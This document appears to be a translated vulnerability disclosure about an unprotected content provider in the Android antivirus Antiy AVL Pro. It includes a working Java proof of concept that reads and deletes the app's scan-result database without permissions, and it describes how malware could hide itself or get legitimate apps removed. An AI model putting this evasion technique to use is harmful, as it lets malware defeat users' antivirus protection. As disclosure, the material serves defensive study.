The Antiy vulnerability can cause virus-free or mistaken removal of legitimate software.

The Antiy vulnerability can cause virus-free or mistaken removal of legitimate software.

The android version of Antiy avl pro has a vulnerability. If used by viruses or Trojans, the vulnerability can be detected by avl scans.

After avl pro detects and removes mobile phones, the results are saved in the db first, and then the scan information is read and displayed to the user through the provider. If there is a virus, the system prompts you to delete or clear the mobile phone.

The provider name is content: // com. antiy. avlpro. MyProvider, but the provider has no permission to expose it.

As a result, any apk can be accessed without any special permissions, and the contents in the database can be read, deleted, or inserted.

Therefore, if malicious programs exploit this vulnerability, content insertion can be constructed to lead to avl misjudgment/deletion of normal and legal apk; or real-time (or short-time thread polling) if you see your package in the db, delete it to avoid killing it.

Poc:

 

package com.ieroot.android_providerdemo;import android.net.Uri;import android.os.Bundle;import android.app.Activity;import android.content.ContentResolver;import android.database.Cursor;import android.view.Menu;import android.view.View;import android.view.View.OnClickListener;import android.widget.Button;import android.widget.TextView;import android.widget.Toast;public class MainActivity extends Activity implements OnClickListener{@Overrideprotected void onCreate(Bundle savedInstanceState) {super.onCreate(savedInstanceState);setContentView(R.layout.activity_main);TextView tView = (TextView)findViewById(R.id.result);tView.setText(getData());// add onclick listenerButton show = (Button)findViewById(R.id.show);show.setOnClickListener(this);Button delete = (Button)findViewById(R.id.delete);delete.setOnClickListener(this);}@Overridepublic boolean onCreateOptionsMenu(Menu menu) {// Inflate the menu; this adds items to the action bar if it is present.getMenuInflater().inflate(R.menu.main, menu);return true;}public String  getData() {String avlUri = "content://com.antiy.avlpro.MyProvider";String resultString = "";ContentResolver resolver = this.getContentResolver();Cursor cursor = resolver.query(Uri.parse(avlUri), new String[]{"pkg_name","v_name"}, null, null, null);while (cursor.moveToNext()) {String pkg_name = cursor.getString(cursor.getColumnIndex("pkg_name"));String v_name = cursor.getString(cursor.getColumnIndex("v_name"));resultString += pkg_name + "\t" + v_name;}return resultString;}public void deleteData() {String avlUri = "content://com.antiy.avlpro.MyProvider";ContentResolver resolver = this.getContentResolver();resolver.delete(Uri.parse(avlUri), "pkg_name = 'com.tf.thinkdroid.sg'", null);Toast.makeText(this, "delete is clicked", 0);}@Overridepublic void onClick(View arg0) {// TODO Auto-generated method stubif (arg0.getId() == R.id.show) {TextView tView = (TextView)findViewById(R.id.result);tView.setText("show : " + "\n" + getData());}if (arg0.getId() == R.id.delete){deleteData();}}}

In order to prove the process clearly, we will split the steps and explain them one by one. In actual use, users will not see any of these processes. We can only bear the results: viruses are not found or legal programs are scanned and killed.

:

Avl removes a risk in this figure. Remember the name.

Figure 1,


 

In this figure, the POC program reads the content in the db through the exposed provider.

Figure 2,

Click Delete button to delete the content in the database.

In this figure, the content in the db is empty.

Figure 3,

Return to the avlpro interface and display 0 threats:

Figure 4,





 

That is to say, if the POC program does not apply for any permissions, the avl pro discriminant result is successfully modified.
Divergent thinking ~~